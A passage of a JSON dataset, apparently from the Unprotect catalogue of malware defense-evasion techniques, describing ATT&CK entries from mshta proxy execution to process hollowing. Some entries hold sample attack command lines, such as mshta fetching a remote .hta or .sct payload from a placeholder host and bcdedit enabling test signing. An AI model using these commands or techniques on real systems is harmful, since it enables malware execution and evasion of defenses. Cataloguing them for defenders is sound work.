"unprotect_id": "T1218.005",
"name": "System Binary Proxy Execution: Mshta",
"description": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code.\r\n\r\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.\r\n\r\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\r\n\r\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\r\n\r\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1218/005/",
"creation_date": "2023-03-04T23:47:38.933000Z",
"tags": "Defense Evasion,\r\nmshta.exe,\r\nMicrosoft HTML Applications (HTA) files,\r\nJavaScript,\r\nVBScript,\r\nmshta http[:]//webserver/payload[.]hta,\r\nmshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\")),\r\nbypass application control,\r\nbypass browser security settings,\r\nAPT29,\r\nAPT32,\r\nexecute malicious scripts,",
"modification_date": "2023-10-04T10:43:29.549000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 322,
"key": "system-binary-proxy-execution-installutil",
"unprotect_id": "T1218.004",
"name": "System Binary Proxy Execution: InstallUtil",
"description": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe.\r\n\r\nInstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)].",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1218/004/",
"creation_date": "2023-03-04T23:43:22.555000Z",
"tags": "Defense Evasion,\r\nC:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe,\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe,\r\n[System.ComponentModel.RunInstaller(true)],\r\ndisable Windows Defender,\r\nexecute malicious code,",
"modification_date": "2023-10-04T10:44:22.675000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 321,
"key": "system-binary-proxy-execution-cmstp",
"unprotect_id": "T1218.003",
"name": "System Binary Proxy Execution: CMSTP",
"description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\r\n\r\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. Similar to Regsvr32 / \"Squiblydoo\", CMSTP.exe may be abused to load and execute DLLs and/or COM scriptlets (SCT) from remote servers. This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft.\r\n\r\nCMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1218/003/",
"creation_date": "2023-03-04T23:30:50.977000Z",
"tags": "Defense Evasion,\r\nMicrosoft Connection Manager Profile Installer (CMSTP.exe),\r\nINF files,\r\nmalicious COM scriptlets (SCT),\r\nmalicious DLLs,\r\nbypass AppLocker,\r\nBypass User Account Control,",
"modification_date": "2023-10-04T10:44:22.436000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 320,
"key": "system-binary-proxy-execution-control-panel",
"unprotect_id": "T1218.002",
"name": "System Binary Proxy Execution: Control Panel",
"description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.\r\n\r\nControl Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.\r\n\r\nMalicious Control Panel items can be delivered via Phishing campaigns or executed as part of multi-stage malware. Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.\r\n\r\nAdversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1218/002/",
"creation_date": "2023-03-04T23:27:05.191000Z",
"tags": "Defense Evasion,\r\ncontrol.exe,\r\nControl Panel (.cpl)\r\nCPlApplet function,\r\nbypass application allow lists,\r\nbypass file extension allow lists,\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls,\r\nDllEntryPoint,",
"modification_date": "2023-10-04T10:43:16.676000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 319,
"key": "system-binary-proxy-execution-compiled-html-file",
"unprotect_id": "T1218.001",
"name": "System Binary Proxy Execution: Compiled HTML File",
"description": "Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. CHM content is displayed using underlying components of the Internet Explorer browser loaded by the HTML Help executable program (hh.exe).\r\n\r\nA custom CHM file containing embedded payloads could be delivered to a victim then triggered by User Execution. CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1218/001/",
"creation_date": "2023-03-04T23:21:47.629000Z",
"tags": "Defense Evasion,\r\nAPT38,\r\nAPT41,\r\nMicrosoft HTML Help system,\r\nhh.exe,\r\nbypass application application control,",
"modification_date": "2023-10-04T10:43:10.638000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 318,
"key": "subvert-trust-controls-code-signing-policy-modification",
"unprotect_id": "T1553.006",
"name": "Subvert Trust Controls: Code Signing Policy Modification",
"description": "Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system.\r\n\r\nSome of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows. Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.\r\n\r\nAdversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, Modify Registry, rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory. Examples of commands that can modify the code signing policy of a system include bcdedit.exe -set TESTSIGNING ON on Windows. Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.\r\n\r\nTo gain access to kernel memory to modify variables related to signature checks, such as modifying g_CiOptions to disable Driver Signature Enforcement, adversaries may conduct Exploitation for Privilege Escalation using a signed, but vulnerable driver.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1553/006/",
"creation_date": "2023-03-04T00:52:29.582000Z",
"tags": "Defense Evasion,\r\nexecution of unsigned code,\r\nexecution of self-signed code,\r\nDriver Signature Enforcement (DSE),\r\nbcdedit.exe -set TESTSIGNING ON,\r\ndisable RequireSigned,\r\ng_CiOptions,\r\nPrivilege Escalation,\r\nAPT39,\r\nenable TESTSIGNING,\r\ndisable driver signing verification,",
"modification_date": "2023-10-04T10:43:00.943000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 317,
"key": "subvert-trust-controls-mark-of-the-web-bypass",
"unprotect_id": "T1553.005",
"name": "Subvert Trust Controls: Mark-of-the-Web Bypass",
"description": "Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW. Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.\r\n\r\nAdversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1553/005/",
"creation_date": "2023-03-04T00:46:07.229000Z",
"tags": "Defense Evasion,\r\nMark-of-the-Web (MOTW) controls,\r\nNTFS Alternate Data Stream (ADS),\r\nZone.Identifier,\r\nWindows Defender SmartScreen,\r\ncompressed/archive (.arj, .gzip) format,\r\ndisk image (.iso, .vhd) file format,\r\nAPT29,",
"modification_date": "2023-10-04T10:44:22.140000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 316,
"key": "subvert-trust-controls-install-root-certificate",
"unprotect_id": "T1553.004",
"name": "Subvert Trust Controls: Install Root Certificate",
"description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\r\n\r\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.\r\n\r\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide Adversary-in-the-Middle capability for intercepting information transmitted over secure TLS/SSL communications.\r\n\r\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1553/004/",
"creation_date": "2023-03-04T00:41:29.779000Z",
"tags": "Defense Evasion,\r\nroot certificate authority (CA),\r\ncloning root certificates,\r\nAdversary-in-the-Middle,\r\nroot CA,\r\nTrusted Publisher,\r\ncertutil,\r\nadd-trusted-cert,\r\ncertmgr.exe,",
"modification_date": "2023-10-04T10:42:58.127000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 315,
"key": "subvert-trust-controls-sip-and-trust-provider-hijacking",
"unprotect_id": "T1553.003",
"name": "Subvert Trust Controls: SIP and Trust Provider Hijacking",
"description": "Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. \r\n\r\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all) and are identified by globally unique identifiers (GUIDs).\r\n\r\nSimilar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by:\r\n\r\nModifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP [6] (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\r\n\r\nModifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[WOW6432Node]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP [with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.\r\n\r\nModifying the DLL and Function Registry values in HKLM\\SOFTWARE[WOW6432Node]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).\r\nNote: The above hijacks are also possible without modifying the Registry via DLL Search Order Hijacking.\r\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1553/003/",
"creation_date": "2023-03-04T00:36:46.332000Z",
"tags": "Defense Evasion,\r\nmanipulate SIP,\r\nhijack SIP,\r\nmanipulate trust provider components,\r\nWindows Authenticode,\r\nWinVerifyTrust,\r\nsignature validation,\r\nSubject Interface Packages (SIPs),\r\nglobally unique identifiers (GUIDs),\r\nsubvert trust controls,\r\nbypass security policies,\r\nDll Registry value,\r\nFuncName Registry value,\r\nCryptSIPDllGetSignedDataMsg function,\r\nHKLM\\SOFTWARE[\\WOW6432Node]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg{SIP_GUID},\r\nHKLM\\SOFTWARE[WOW6432Node]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData{SIP_GUID},\r\nHKLM\\SOFTWARE[WOW6432Node]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy{trust provider GUID},\r\nenable persistent code execution,",
"modification_date": "2023-10-04T10:44:22.284000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 314,
"key": "subvert-trust-controls-code-signing",
"unprotect_id": "T1553.002",
"name": "Subvert Trust Controls: Code Signing",
"description": "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. The certificates used during an operation may be created, acquired, or stolen by the adversary. Unlike Invalid Code Signature, this activity will result in a valid signature.\r\n\r\nCode signing to verify software on first run can be used on modern Windows systems.\r\n\r\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1553/002/",
"creation_date": "2023-03-04T00:24:59.655000Z",
"tags": "Defense Evasion,\r\nfalsification of trusted signatures,\r\ncode signing,\r\nfalsifying certificates,\r\nself signed digital certificates,\r\nfake certificates,\r\nvalid CA,\r\ninvalid certificates,\r\nrevoked certificates,\r\nstolen certificates,\r\nforged certificates,\r\nAPT29,\r\nAPT41,",
"modification_date": "2023-10-04T10:44:59.378000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 313,
"key": "rootkit",
"unprotect_id": "T1014",
"name": "Rootkit",
"description": "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.\r\n\r\nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, network connections or System Firmware.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1014/",
"creation_date": "2023-02-24T04:26:41.720000Z",
"tags": "Defense Evasion,\r\nintercepting/hooking and modifying operating system API calls,\r\nhypervisor, \r\nMaster Boot Record, \r\nSystem Firmware,\r\nobfuscation of malware,\r\nobfuscation of payloads,\r\nobfuscation of system resource usage,\r\nAPT28,\r\npersistent remote access,",
"modification_date": "2023-10-04T10:44:05.739000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 312,
"key": "rogue-domain-controller",
"unprotect_id": "T1207",
"name": "Rogue Domain Controller",
"description": "Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.\r\n\r\nRegistering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. \r\n\r\nThis technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform SID-History Injection and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1207/",
"creation_date": "2023-02-24T04:20:52.927000Z",
"tags": "Defense Evasion,\r\nPersistence,\r\nActive Directory manipulation,\r\nDCShadow,\r\nmimic Domain Controller (DC),\r\nnTDSDSA object,\r\nprivilege elevation,\r\nKRBTGT hash,\r\nbypass system logging and security monitors,\r\nbypass security information and event management (SIEM),\r\nalter and delete replication and metadata,\r\nSID-History Injection,\r\nmanipulate AD objects,",
"modification_date": "2023-10-04T10:44:29.580000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 311,
"key": "reflective-code-loading",
"unprotect_id": "T1620",
"name": "Reflective Code Loading",
"description": "Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).\r\n\r\nReflective code injection is very similar to Process Injection except that the \"injection\" loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1620/",
"creation_date": "2023-02-24T04:14:52.913000Z",
"tags": "Defense Evasion,\r\nmalicious code injection,\r\nexecuting payloads directly within process memory,\r\ncompiled binaries, \r\nanonymous files (only present in RAM), \r\nfileless executable code,\r\nevade process-based detections,\r\nmimic legitimate process,\r\nencrypted payload,\r\nobfuscated payload,",
"modification_date": "2023-10-04T10:44:18.491000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 310,
"key": "process-injection-listplanting",
"unprotect_id": "T1055.015",
"name": "Process Injection: ListPlanting",
"description": "Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.\r\n\r\nList-view controls are user interface windows used to display collections of items. Information about an application's list-view settings are stored within the process' memory in a SysListView32 control.\r\n\r\nListPlanting (a form of message-passing \"shatter attack\") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items. Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the SysListView32 child of the victim process window (via Windows API calls such as FindWindow and/or EnumWindows) or other Process Injection methods.\r\n\r\nSome variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored WriteProcessMemory function. For example, an adversary can use the PostMessage and/or SendMessage API functions to send LVM_SETITEMPOSITION and LVM_GETITEMPOSITION messages, effectively copying a payload 2 bytes at a time to the allocated memory.\r\n\r\nFinally, the payload is triggered by sending the LVM_SORTITEMS message to the SysListView32 child of the process window, with the payload within the newly allocated buffer passed and executed as the ListView_SortItems callback.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1055/015/",
"creation_date": "2023-02-24T04:11:30.064000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\ninject malicious code into hijacked processes,\r\nevade detection from security products,\r\nSysListView32 control,\r\nmessage-passing shatter attack\r\ncustom callback,\r\nFindWindow,\r\nEnumWindows,\r\nwindow messages,\r\nLVM_SETITEMPOSITION message,\r\nLVM_GETITEMPOSITION message,\r\nLVM_SORTITEMS message,\r\nListView_SortItems callback,\r\nWriteProcessMemory function,",
"modification_date": "2023-10-04T10:44:02.072000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 309,
"key": "process-injection-process-doppelganging",
"unprotect_id": "T1055.013",
"name": "Process Injection: Process Doppelgänging",
"description": "Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process.\r\n\r\nWindows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction.\r\n\r\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. \r\n\r\nAdversaries may abuse TxF to a perform a file-less variation of Process Injection. Similar to Process Hollowing, process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext.\r\n\r\nProcess Doppelgänging is implemented in 4 steps:\r\n\r\nTransact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\r\nLoad – Create a shared section of memory and load the malicious executable.\r\nRollback – Undo changes to original executable, effectively removing malicious code from the file system.\r\nAnimate – Create a process from the tainted section of memory and initiate execution.\r\nThis behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1055/013/",
"creation_date": "2023-02-24T04:06:01.468000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\nWindows Transactional NTFS (TxF),\r\nTxF application programming interface (API),\r\nfile-less variation of Process Injection,\r\nreplacing memory of a legitimate process with malicious code,\r\nTxF transaction,\r\nevade detection from security products, \r\nmimic legitimate process,\r\nabuse NTFS transactions,",
"modification_date": "2023-10-04T10:44:17.444000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 308,
"key": "process-injection-process-hollowing",
"unprotect_id": "T1055.012",
"name": "Process Injection: Process Hollowing",
"description": "Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.\r\n\r\nProcess hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.\r\n\r\nThis is very similar to Thread Local Storage but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1055/012/",
"creation_date": "2023-02-24T03:59:59.456000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\ninject suspended and hollowed processes,\r\nCreateProcess,\r\nZwUnmapViewOfSection,\r\nNtUnmapViewOfSection,\r\nVirtualAllocEx, \r\nWriteProcessMemory, \r\nSetThreadContext, \r\nResumeThread,\r\nreallocating space with malicious code,\r\npermission inheritance,",
"modification_date": "2023-10-04T10:44:16.612000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 307,
"key": "process-injection-extra-window-memory-injection",
"unprotect_id": "T1055.011",
"name": "Process Injection: Extra Window Memory Injection",
"description": "Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.\r\n\r\nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data). Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. \r\n\r\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.\r\n\r\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread. More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process.\r\n\r\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1055/011/",
"creation_date": "2023-02-24T03:54:55.312000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation.\r\nmalicious code injection,\r\nmemory access,\r\nevade process-based defenses,\r\nprivilege escalation,\r\nwriting payloads to shared sections,\r\noverwrite function pointer,",
"modification_date": "2023-10-04T10:44:16.353000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 306,
"key": "process-injection-thread-local-storage",
"unprotect_id": "T1055.005",
"name": "Process Injection: Thread Local Storage",
"description": "Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process.\r\n\r\nTLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other Process Injection techniques such as Process Hollowing.\r\n\r\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1055/005/",
"creation_date": "2023-02-24T03:34:35.743000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\nthread local storage (TLS) callbacks,\r\nevade process-based defenses,\r\nprivilege escalation,\r\nmimic legitimate process,\r\nprocess injection,",
"modification_date": "2023-10-04T10:42:48.678000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 305,
"key": "process-injection-asynchronous-procedure-call",
